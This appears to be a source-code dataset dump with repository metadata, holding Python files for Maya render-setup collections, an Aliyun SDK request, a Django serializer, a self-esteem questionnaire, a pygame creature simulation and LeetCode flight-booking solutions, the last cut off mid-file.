selectorProperties = dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME].values()[0]
self.getSelector()._decodeProperties(selectorProperties)
if jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME in dict:
self._decodeChildren(dict[jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME],
mergeType,
prependToName)
def acceptImport(self):
super(Collection, self).acceptImport()
for child in self.getChildren():
child.acceptImport()
def isSelfAcceptableChild(self):
"""Overridden instances that return False, prevent copy/paste of the collection type to itself."""
return True
def isAcceptableChild(self, modelOrData):
""" Check if the model could be a child"""
if isinstance(modelOrData, clipboardData.ClipboardData):
isOverride = modelOrData.typeName() in _overrideTypes
parentTypeName = modelOrData.parentTypeName
else:
isOverride = isinstance(modelOrData, override.Override)
parentTypeName = modelOrData.parent().typeName()
return isOverride and parentTypeName == self.typeName() or (modelOrData.typeName() == self.typeName() and self.isSelfAcceptableChild())
def isTopLevel(self):
"""Is the collection's parent a render layer?"""
# Don't have access to renderLayer.RenderLayer, type check on
# Collection instead.
return not isinstance(self.parent(), Collection)
def ancestorCollections(self):
"""Return this collection's ancestors.
Neither the collection itself, nor the render layer, are included
in the ancestors. Therefore, a top-level collection has no
ancestors."""
parent = self.parent()
while isinstance(parent, Collection):
yield parent
parent = parent.parent()
class LightsCollection(Collection):
"""
LightsCollection node.
A collection node specific for grouping light sources
and overrides on those light sources.
This collection should have all light sources as member by default. All nodes
matching the light classification should be returned by the selector
on this collection.
"""
kTypeId = typeIDs.lightsCollection
kTypeName = 'lightsCollection'
@staticmethod
def creator():
return LightsCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
LightsCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(LightsCollection, self).__init__()
def typeId(self):
return LightsCollection.kTypeId
def typeName(self):
return LightsCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(selector.SimpleSelector.kTypeName)
# Make it select all light sources in the scene
self.getSelector().setPattern("*")
self.getSelector().setFilterType(selector.Filters.kLights)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def createCollection(self, collectionName):
""" Add a lights child collection to the Collection. """
return self._createCollection(collectionName, LightsChildCollection.kTypeName)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
We want to prevent copying LightsChildCollections in the same
LightsCollection at the expense of not being able to copy
LightsChildCollections between different LightsCollections.
"""
return False
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
class LightsChildCollection(Collection):
"""
LightsChildCollection node.
A child collection node specific for one single light source
and overrides on this light source.
"""
kTypeId = typeIDs.lightsChildCollection
kTypeName = 'lightsChildCollection'
@staticmethod
def creator():
return LightsChildCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
LightsChildCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(LightsChildCollection, self).__init__()
def typeId(self):
return LightsChildCollection.kTypeId
def typeName(self):
return LightsChildCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(selector.SimpleSelector.kTypeName)
# Only accepts light sources.
self.getSelector().setFilterType(selector.Filters.kLights)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
Pasting is prevented because the Light Editor considers only the
first override in the LightsChildCollection. Additionally dragging
is prevented between overrides in LightsChildCollections to prevent
dragging between incompatible LightsChildCollection types
(ie. point light, spot light)
"""
return False
class RenderSettingsCollection(Collection):
"""
Render Settings Collection node.
This collection has an ordered list of children, and a static & const selector
to determine nodes to which the children apply. The list of nodes is based
on the selected renderer at the time of creation.
MAYA-66757:
- A base collection will be needed to factorize commonalities and segregate differences.
- A static selector is needed which could be the existing static selection or an object set.
- The name is read-only.
- The selector content is read-only
- The render name should be part of the collection so that the settings are clearly linked
to the used renderer, or linked using a plug
"""
kTypeId = typeIDs.renderSettingsCollection
kTypeName = 'renderSettingsCollection'
# Type of selector created by this collection
kSelectorTypeName = selector.SimpleSelector.kTypeName
@staticmethod
def creator():
return RenderSettingsCollection()
@staticmethod
def initializer():
# A render settings collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other attributes.
RenderSettingsCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(RenderSettingsCollection, self).__init__()
@staticmethod
def containsNodeName(nodeName):
return nodeName in renderSettings.getDefaultNodes()
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(self.kSelectorTypeName)
# Set the default nodes as static selection
# Note: Some renderers could return nodes which do not exist yet.
self.getSelector().staticSelection.setWithoutExistenceCheck(renderSettings.getDefaultNodes())
self.getSelector().setFilterType(selector.Filters.kAll)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def typeId(self):
return RenderSettingsCollection.kTypeId
def typeName(self):
return RenderSettingsCollection.kTypeName
def appendChild(self, child):
if isinstance(child, Collection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(RenderSettingsCollection, self).appendChild(child)
def attachChild(self, pos, child):
if isinstance(child, Collection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(RenderSettingsCollection, self).attachChild(pos, child)
def _createCollection(self, collectionName, typeName):
raise RuntimeError(kIncorrectChildType % typeName)
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
No collection of any kind can be a child of this collection."""
return modelOrData.typeName() not in _collectionTypes and \
super(RenderSettingsCollection, self).isAcceptableChild(modelOrData)
def _getOverrideType(self, plg, overrideType):
overrideType = super(RenderSettingsCollection, self)._getOverrideType(plg, overrideType)
return typeIDs.absUniqueOverride if overrideType == typeIDs.absOverride else typeIDs.relUniqueOverride
class AOVCollection(Collection):
"""
AOV (arbitrary output variable) parent collection node.
"""
kTypeId = typeIDs.aovCollection
kTypeName = 'aovCollection'
@staticmethod
def creator():
return AOVCollection()
@staticmethod
def initializer():
# An AOV collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other attributes.
AOVCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(AOVCollection, self).__init__()
@staticmethod
def containsNodeName(nodeName):
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
try:
callbacks.getAOVName(nodeName)
return True
except:
return False
def _createSelector(self, parent=None, selArgs=None):
# Selector type name argument is ignored.
self._createAndConnectSelector('')
def _createSelectorNode(self, typeName, selectorName, selArgs):
# Ignore the argument selector type name: get the AOV collection
# selector from the AOV renderer callback.
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
return callbacks.getCollectionSelector(selectorName)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def typeId(self):
return AOVCollection.kTypeId
def typeName(self):
return AOVCollection.kTypeName
def appendChild(self, child):
if isinstance(child, Collection) and not isinstance(child, AOVChildCollection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(AOVCollection, self).appendChild(child)
def attachChild(self, pos, child):
if isinstance(child, Collection) and not isinstance(child, AOVChildCollection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(AOVCollection, self).attachChild(pos, child)
# This should never be called, as AOVCollections are created in renderLayer.py in aovCollectionInstance()
def _createCollection(self, collectionName, typeName):
raise RuntimeError(kIncorrectChildType % typeName)
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
class AOVChildCollection(Collection):
"""
AOV (arbitrary output variable) Child Collection node.
"""
kTypeId = typeIDs.aovChildCollection
kTypeName = 'aovChildCollection'
@staticmethod
def creator():
return AOVChildCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
AOVChildCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(AOVChildCollection, self).__init__()
def containsNodeName(self, nodeName):
return nodeName in self.getSelector().getAbsoluteNames()
def typeId(self):
return AOVChildCollection.kTypeId
def typeName(self):
return AOVChildCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
# Selector type name argument is ignored.
self._createAndConnectSelector('', selArgs)
def _createSelectorNode(self, typeName, selectorName, selArgs):
# Ignore the argument selector type name: get the AOV child
# collection selector from the AOV renderer callback.
#
# selArgs is a dictionary for selector argument
# construction. It must contain a value for 'aovName'.
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
return callbacks.getChildCollectionSelector(selectorName, selArgs['aovName'])
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isSelfAcceptableChild(self):
"""This code prevents copy/paste of AOV child collections to themselves/other AOV child collections."""
return False
@undo.chunk('Create collection')
@namespace.root
def create(name, nodeType=Collection.kTypeName, parent=None, **selArgs):
""" Create a collection.
Returns the MPxNode object corresponding to the created
collection node. A RuntimeError is raised in case of error.
The selArgs keyword arguments are passed along to the selector creation.
This function is undoable.
"""
# collection names should never contain namespace delimiter or other invalid characters
# collections belong to current namespace (i.e. root)
name = re.sub(r'[^a-zA-Z0-9_]', '_', name)
if isinstance(nodeType, basestring):
typeName = nodeType
else:
typeName = cmds.objectType(typeFromTag=nodeType.id())
# To avoid writing a command to implement collection creation,
# re-use existing name-based commands for undo / redo purposes, since
# collection creation is not performance-critical. If the name
# flag is specified, it cannot be an empty string.
returnCollectionName = cmds.createNode(
typeName, name=name, skipSelect=True) if name else \
cmds.createNode(typeName, skipSelect=True)
collection = utils.nameToUserNode(returnCollectionName)
collection._createSelector(parent=parent, selArgs=selArgs)
return collection
@undo.chunk('Delete collection')
def delete(collection):
"""Remove the argument collection from the scene.
All overrides and sub-collections in the collection are removed."""
# Inform our parent (if any) of upcoming delete.
# This will remove the collection from its parent,
# and will trigger deactivation of the collection
# causing it and the selector to stop listening to scene and attribute changes.
# Need to call _preChildDelete before removing children, otherwise we lose the parenting information
# to the children which may be used by the parent (ex: renderLayers use that information
# to determine if they need to be refreshed).
parent = collection.parent()
if parent:
parent._preChildDelete(collection)
# Delete the children.
for child in collection.getChildren():
if isinstance(child, Collection):
delete(child)
else:
override.delete(child)
# Deleting the selector means unhooking the selector node
# from the collection and removing it from the scene.
collection._deleteSelector()
# Deleting the node will remove it from the scene.
utils.deleteNode(collection)
@undo.chunk('Unapply a collection')
def unapply(collection):
''' Command to unapply a collection '''
if isinstance(collection, Collection):
for c in collection.getChildren():
unapply(c)
else:
# End of recursion so unapply the override
# using a command
override.UnapplyCmd.execute(collection)
def getAllCollectionClasses():
""" Returns the list of Collection subclasses """
return commonUtils.getSubClasses(Collection)
_collectionTypes = { c.kTypeName for c in getAllCollectionClasses() }
_overrideTypes = { o.kTypeName for o in overrideUtils.getAllOverrideClasses() }
# ===========================================================================
# Copyright 2016 Autodesk, Inc. All rights reserved.
#
# Use of this software is subject to the terms of the Autodesk license
# agreement provided at the time of installation or download, or which
# otherwise accompanies this software in either electronic or hard copy form.
# ===========================================================================
| [
"[email protected]"
] | |
4c97d826d472e0652439b84bf0a10fcd553a634a | 3f7fcd4caf0f1caf2b4cdb71f5691ea504358292 | /sampletest3.py | d81d1e4bb717df1f0c61f56b69257a1a18f0657d | [] | no_license | tarak1006/python | 2369d16da5d17c90462068480461f32e3320258a | 1aa1ce6429a3a836073b8a8a359ef8ca91b3bfea | refs/heads/master | 2021-07-10T18:01:30.353637 | 2017-10-14T14:02:34 | 2017-10-14T14:02:34 | 106,932,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py |
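# Computes the length of the longest divisibility chain in a (in index order):
# Best(i) is the longest chain ending at a[i] where every earlier element divides it.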
a=[2,11,16,12,36,60,71,17,29,144,288,129,432,993]
n = len(a)
def Best(i):
if i==0:
return 1
else:
m=1
for j in range(i):
if a[i]%a[j]==0:
m=max(m,Best(j)+1)
return m
res=[]
for j in range(n):
res.append(Best(j))
print(max(res))
| [
"[email protected]"
] | |
95b9fdca571f3e098ef2c1ff21e6bd48597afc65 | f09dc121f213f2881df3572288b7ee5b39246d73 | /aliyun-python-sdk-cms/aliyunsdkcms/request/v20190101/ModifyHostInfoRequest.py | b5160544bcb63311836cf513c07824b15c12694d | [
"Apache-2.0"
] | permissive | hetw/aliyun-openapi-python-sdk | 2f31378ad6be0896fb8090423f607e9c7d3ae774 | 7443eacee9fbbaa93c7975c6dbec92d3c364c577 | refs/heads/master | 2023-01-19T22:42:36.214770 | 2020-12-04T10:55:14 | 2020-12-04T10:55:14 | 318,689,093 | 1 | 0 | NOASSERTION | 2020-12-05T03:03:03 | 2020-12-05T03:03:03 | null | UTF-8 | Python | false | false | 1,332 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
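# Hypothetical usage sketch (assumes credentials and region are configured elsewhere):
#
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
#   request = ModifyHostInfoRequest()
#   request.set_InstanceId('i-xxxxxxxxxxxx')
#   request.set_HostName('new-host-name')
#   response = client.do_action_with_exception(request)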
class ModifyHostInfoRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cms', '2019-01-01', 'ModifyHostInfo','cms')
self.set_method('POST')
def get_HostName(self):
return self.get_query_params().get('HostName')
def set_HostName(self,HostName):
self.add_query_param('HostName',HostName)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId) | [
"[email protected]"
] | |
432aae4837c6d251b61eb69326fd327cebce4c6c | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/resourcecenter/serializers/processing_metrics_serializers.py | bb72d5540d96efd33b60750a04d702611cbf0b03 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 2,364 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import datetime
from django.utils.translation import ugettext as _
from rest_framework import serializers
from common.exceptions import ValidationError
class ProcessingMetricSummarySerializer(serializers.Serializer):
start_time = serializers.CharField(label=_("开始日期"))
end_time = serializers.CharField(label=_("结束日期"))
geog_area_code = serializers.CharField(required=False, label=_("地区"))
def validate_start_time(self, start_time):
try:
datetime.datetime.strptime(start_time, "%Y-%m-%d %H:%M:%S")
except ValueError:
            raise ValidationError(_("Start date must be in the format YYYY-MM-DD HH:MM:SS"))
return start_time
def validate_end_time(self, end_time):
try:
datetime.datetime.strptime(end_time, "%Y-%m-%d %H:%M:%S")
except ValueError:
            raise ValidationError(_("End date must be in the format YYYY-MM-DD HH:MM:SS"))
return end_time
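# Illustrative usage sketch (added for clarity; not part of the original
# module). The payload values below are invented, and running this requires
# a configured Django environment, so it is shown as a comment only:
#
#   s = ProcessingMetricSummarySerializer(data={
#       "start_time": "2022-01-01 00:00:00",
#       "end_time": "2022-01-02 00:00:00",
#   })
#   s.is_valid()  # the validators above parse both fields with strptime;
#                 # a malformed date raises the project's ValidationError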
| [
"[email protected]"
] | |
c281292e06d3742bd682a5d8766d5862720b284c | 6f63ad6f179c4c5bc4e2c82f741067fc030e1351 | /CSE111/esteem.py | dfdfd26f68658ce800c957c9f573228e2ca89a12 | [] | no_license | Kyle5150/CSE111 | 8e152fdbac93854259de8b7328dd183ccbafe35a | 7f4db03eed69232085323fb5dd80e60a0fa5b618 | refs/heads/main | 2023-06-02T20:00:49.043137 | 2021-06-17T07:26:51 | 2021-06-17T07:26:51 | 377,741,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | NEGATIVE = -1
POSITIVE = 1
def main():
print("This program is an implementaiton of the Rosenberg Self-Esteem Scale.")
print("This program will show you ten statements that you could possibly")
print("apply to yourself. Please rate how much you agree with each of the")
print("statements by responding with one of these four letters:")
print()
print("D means you strongly disagree with the statement.")
print("d means you disagree with the statement.")
print("a means you agree with the statement.")
print("A means you strongly agree with the statement.")
print()
score = 0
score += ask_question("1. I feel that I am a person of worth, at least on an equal plane with others.", POSITIVE)
score += ask_question("2. I feel that I have a number of good qualities.", POSITIVE)
score += ask_question("3. All in all, I am inclined to feel that I am a failure.", NEGATIVE)
score += ask_question("4. I am able to do things as well as most other people.", POSITIVE)
score += ask_question("5. I feel I do not have much to be proud of.", NEGATIVE)
score += ask_question("6. I take a positive attitude toward myself.", POSITIVE)
score += ask_question("7. On the whole, I am satisfied with myself.", POSITIVE)
score += ask_question("8. I wish I could have more respect for myself.", NEGATIVE)
score += ask_question("9. I certainly feel useless at times.", NEGATIVE)
score += ask_question("10. At times I think I am no good at all.", NEGATIVE)
print()
print(f"Your score is {score}.")
print("A score below 15 may indicate problematic low self-esteem.")
def ask_question(statement, pos_or_neg):
"""Display one statement to the user and get the user's response.
Then determine the score for the response and return the score.
Parameters
statement: The statement to show the user.
pos_or_neg: Either the constant POSITIVE or NEGATIVE.
Return: the score from the user's response to the statement.
"""
print(statement)
answer = input("Enter D, d, a, or A: ")
score = 0
if answer == 'D':
score = 0
elif answer == 'd':
score = 1
elif answer == 'a':
score = 2
elif answer == 'A':
score = 3
if pos_or_neg == NEGATIVE:
score = 3 - score
return score
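# Worked example of the reverse scoring above (added for illustration):
# for the negatively worded item 9, "I certainly feel useless at times.",
# answering 'A' maps to score = 3, which the reversal turns into 3 - 3 = 0,
# while 'D' maps to 0 and is reversed to 3 - 0 = 3. Positively worded items
# keep the raw 0..3 mapping, so higher totals always mean higher self-esteem.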
# If this file was executed like this:
# > python esteem.py
# then call the main function. However, if this file
# was simply imported, then skip the call to main.
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
51573e5e37c9a202919b9704bc45f94207c17118 | 925216786fd041fcf5eaffaecb323e3e7d46e6fc | /cosc343worldPythonMacOS/cosc343world.py | ee5440b02da2f5c7feebb94f44fdfeaa8355e4ce | [] | no_license | HarryMead/NeuralNetworkWorld | a0f1fe8a2e76868612297242a8e3f66d7e080f74 | 98a8ad721c2673b7b26f3cbed19097a717f29cf5 | refs/heads/master | 2022-12-05T22:47:35.688295 | 2020-08-23T12:53:50 | 2020-08-23T12:53:50 | 283,945,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,296 | py | #!/usr/bin/env python
from cosc343worldcc import _cCreature, _cWorld
import numpy as np
import time
import sys
# This is a creature class that your EvolvingCreature needs to inherit from.
# This class wraps the _cCreature class which was implemented in C.
class Creature(_cCreature):
# Your child class must override this method, where the
# mapping of percepts to actions is implemented
def AgentFunction(self, percepts, nActions):
print("Your EvolvingCreature needs to override the AgentFunction method!")
sys.exit(-1)
# Agent function, which is called from the simulation of the world implemented in C.
# This method translates the percepts to a python list, and translates back
# the list representing the actions into C format.
def internal_AgentFunction(self):
# Get the number of percepts and actions
nPercepts = self.numPercepts()
nActions = self.numActions()
# Create lists of percepts
percepts = np.zeros((nPercepts))
for i in range(nPercepts):
percepts[i] = self.getPercept(i)
# Execute the AgentFunction method that needs to be implemented
# by the EvolvingCreature. Pass in the list of percepts and
# specify the number of actions expected.
actions = self.AgentFunction(percepts, nActions)
if not isinstance(actions, list) or len(actions) != nActions:
print("Error! Expecting the actions returned from the AgentFunction to be a list of %d numbers." % nActions)
# Translate actions and feed it back to the engine
for i in range(nActions):
self.setAction(i, actions[i])
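# Minimal illustrative subclass (a sketch added for clarity, not part of the
# original file): the engine calls internal_AgentFunction above, which hands
# your AgentFunction a list of percepts and expects back a plain Python list
# of nActions numbers. The uniform-random behaviour here is only a placeholder.
class RandomCreature(Creature):
    def AgentFunction(self, percepts, nActions):
        # Ignore the percepts and return one random value per action
        return list(np.random.rand(nActions))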
# Wrapper class for _cWorld which implements the engine for the simulation
class World(_cWorld):
# Initialise the wrapper with some defaults for the world type, grid size
# and the repeatability setting.
def __init__(self, worldType=1, gridSize=24, repeatable=False):
self.ph = None
self.worldType = worldType
super().__init__(worldType, gridSize, repeatable)
# Feed the next generation of creatures to the simulation
#
# Input: population - a list of creatures for the simulation
def setNextGeneration(self, population):
self.resetCreatures()
for i in range(len(population)):
self.addCreature(population[i])
# Animation of the simulation
#
# Input: titleStr - title string of the simulation
# speed - of the visualisation: can be 'slow', 'normal' or 'fast'
def show_simulation(self, titleStr = "", speed='normal'):
import pygame
gridSize = self.gridSize()
left_frame = 100
# Initialise pygame
pygame.init()
        # Specify the size of the window
size = width, height = 720, 480
WHITE = (255, 255, 255)
BLACK = 0, 0, 0
if speed == "normal":
frameTurns = 20
nSteps = 10
elif speed == "fast":
frameTurns = 1
nSteps = 5
elif speed == "slow":
frameTurns = 40
nSteps = 10
# Create pygame screen
screen = pygame.display.set_mode(size)
# Compute the size of the individual square
unit = int(np.min([width-left_frame, height])/gridSize)
# Load images
im_strawbs = [pygame.image.load('images/strawberry-green.png'),
pygame.image.load('images/strawberry-red.png')
]
im_creatures = [pygame.image.load('images/smiley_happy.png'),
pygame.image.load('images/smiley_hungry.png'),
pygame.image.load('images/smiley_sick.png')
]
# Scale the images for the size of the individual square
for i in range(len(im_strawbs)):
im_strawbs[i] = pygame.transform.scale(im_strawbs[i], (unit, unit))
for i in range(len(im_creatures)):
im_creatures[i] = pygame.transform.scale(im_creatures[i], (unit, unit))
im_monster = pygame.transform.scale(pygame.image.load("images/monster.png"), (unit, unit))
# Read the total number of turns from the engine
nTurns = self.vis_numTurns()
# The speed of animation depends on specified speed
stepDiff = 1.0/float(nSteps)
# Read the number food items, creatures and monsters from the engine
nFood = self.vis_num(0)
nCreatures = self.vis_num(1)
nMonsters = self.vis_num(2)
nBodies = [nFood, nCreatures, nMonsters]
halfSteps = int(np.floor(nSteps/2))
        # Showing a visualisation of the simulation state at each turn
for t in range(1, nTurns + 1):
# Update the window caption to specify the turn number
pygame.display.set_caption("World %d, %s (turn %d)" % (self.worldType, titleStr, t))
# The nSteps is the number of animations between a turn (the slower, the smoother the animation)
for k in range(nSteps):
for event in pygame.event.get():
if event.type == pygame.QUIT: sys.exit()
# Paint the window in white
screen.fill(WHITE)
# Draw the grid lines in black
for i in range(gridSize + 1):
pygame.draw.line(screen, BLACK, [left_frame, i*unit], [left_frame+(gridSize*unit), i*unit])
pygame.draw.line(screen, BLACK, [left_frame+(i*unit), 0], [left_frame+(i*unit), gridSize * unit])
# Iterate over all item types...
for type in range(3):
# For the number of items in each type...
for i in range(nBodies[type]):
# Get the position and state at turn t
x = self.vis(type, 0, i, t)
y = self.vis(type, 1, i, t)
s = self.vis(type, 2, i, t)
# Get the position at turn t-1
xprev = self.vis(type, 0, i, t-1)
yprev = self.vis(type, 1, i, t-1)
# Compute the shift from t-1 to t based on current frame
xshift = xprev-x
if np.abs(xshift)<=1:
xdiff = (x - xprev) * k * stepDiff
elif k <= halfSteps:
xdiff = np.sign(xshift) * k * stepDiff
else:
xdiff = -np.sign(xshift) * k * stepDiff
xprev = x
yshift = yprev - y
if np.abs(yshift) <= 1:
ydiff = (y - yprev) * k * stepDiff
elif k <= halfSteps:
ydiff = np.sign(yshift) * k * stepDiff
else:
ydiff = -np.sign(yshift) * k * stepDiff
yprev = y
# If the item is food...
if type==0:
# ...depending on the state show the green or red strawberry icon
if s >= 0 and s <= 1:
obj_loc = pygame.Rect(left_frame + (x * unit), y * unit, unit, unit)
obj_im = im_strawbs[s]
screen.blit(obj_im, obj_loc)
# If the item is a creature...
elif type==1:
# ...show only if not dead
if s > 0:
# Depending on state show different creature icon
obj_im = im_creatures[s-1]
obj_loc = pygame.Rect(left_frame + (xprev + xdiff) * unit, (yprev + ydiff) * unit, unit,
unit)
screen.blit(obj_im, obj_loc)
# If the item is a monster...
elif type==2:
#...show the monster icon
obj_loc = pygame.Rect(left_frame+(xprev + xdiff) * unit, (yprev + ydiff) * unit, unit, unit)
screen.blit(im_monster, obj_loc)
                # Update the display
pygame.display.flip()
pygame.time.delay(frameTurns)
pygame.display.quit()
pygame.quit()
| [
"[email protected]"
] | |
3941489ec2a7e0de2b1adcec8caab3fafca2f3a0 | 4b4df51041551c9a855468ddf1d5004a988f59a2 | /leetcode_python/Array/corporate-flight-bookings.py | d6486593ea2dc4f37b79869a1f72ef71fc6dc067 | [] | no_license | yennanliu/CS_basics | 99b7ad3ef6817f04881d6a1993ec634f81525596 | 035ef08434fa1ca781a6fb2f9eed3538b7d20c02 | refs/heads/master | 2023-09-03T13:42:26.611712 | 2023-09-03T12:46:08 | 2023-09-03T12:46:08 | 66,194,791 | 64 | 40 | null | 2022-08-20T09:44:48 | 2016-08-21T11:11:35 | Python | UTF-8 | Python | false | false | 5,073 | py | """
1109. Corporate Flight Bookings
Medium
There are n flights that are labeled from 1 to n.
You are given an array of flight bookings bookings, where bookings[i] = [firsti, lasti, seatsi] represents a booking for flights firsti through lasti (inclusive) with seatsi seats reserved for each flight in the range.
Return an array answer of length n, where answer[i] is the total number of seats reserved for flight i.
Example 1:
Input: bookings = [[1,2,10],[2,3,20],[2,5,25]], n = 5
Output: [10,55,45,25,25]
Explanation:
Flight labels: 1 2 3 4 5
Booking 1 reserved: 10 10
Booking 2 reserved: 20 20
Booking 3 reserved: 25 25 25 25
Total seats: 10 55 45 25 25
Hence, answer = [10,55,45,25,25]
Example 2:
Input: bookings = [[1,2,10],[2,2,15]], n = 2
Output: [10,25]
Explanation:
Flight labels: 1 2
Booking 1 reserved: 10 10
Booking 2 reserved: 15
Total seats: 10 25
Hence, answer = [10,25]
Constraints:
1 <= n <= 2 * 104
1 <= bookings.length <= 2 * 104
bookings[i].length == 3
1 <= firsti <= lasti <= n
1 <= seatsi <= 104
"""
# V0
# V1
# IDEA : ARRAY + prefix sum
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328856/JavaC%2B%2BPython-Sweep-Line
# IDEA :
# Set the change of seats for each day.
# If booking = [i, j, k],
# it needs k more seats on the ith day,
# and those seats are no longer needed from the (j+1)th day on.
# Accumulating these changes gives the result we want
# (a worked trace follows the first solution below).
# Complexity
# Time O(booking + N) for one pass on bookings
# Space O(N) for the result
class Solution:
def corpFlightBookings(self, bookings, n):
res = [0] * (n + 1)
for i, j, k in bookings:
res[i - 1] += k
res[j] -= k
for i in range(1, n):
res[i] += res[i - 1]
return res[:-1]
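# Worked trace of the difference array above (added for illustration), using
# Example 1 from the problem statement: bookings = [[1,2,10],[2,3,20],[2,5,25]], n = 5.
#   after [1,2,10]: res = [10, 0, -10, 0, 0, 0]
#   after [2,3,20]: res = [10, 20, -10, -20, 0, 0]
#   after [2,5,25]: res = [10, 45, -10, -20, 0, -25]
# The prefix-sum loop then yields [10, 55, 45, 25, 25, -25], and res[:-1]
# drops the sentinel cell, giving the expected answer [10, 55, 45, 25, 25].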
# V1'
# IDEA : ARRAY + prefix sum
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328949/Simple-Python-solution
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
answer = n * [0]
lst = []
for i, j, num in bookings:
lst.append((i - 1, num))
lst.append((j, -num))
lst.sort()
curr_num = 0
prev_i = 0
for i, num in lst:
for j in range(prev_i, i):
answer[j] += curr_num
prev_i = i
curr_num += num
return answer
# V1''
# IDEA : ARRAY
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328893/Short-python-solution
# IDEA : Simply use two arrays to keep track of how many bookings are added for every flight.
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
opens = [0]*n
closes = [0]*n
for e in bookings:
opens[e[0]-1] += e[2]
closes[e[1]-1] += e[2]
ret, tmp = [0]*n, 0
for i in range(n):
tmp += opens[i]
ret[i] = tmp
tmp -= closes[i]
return ret
# V1'''
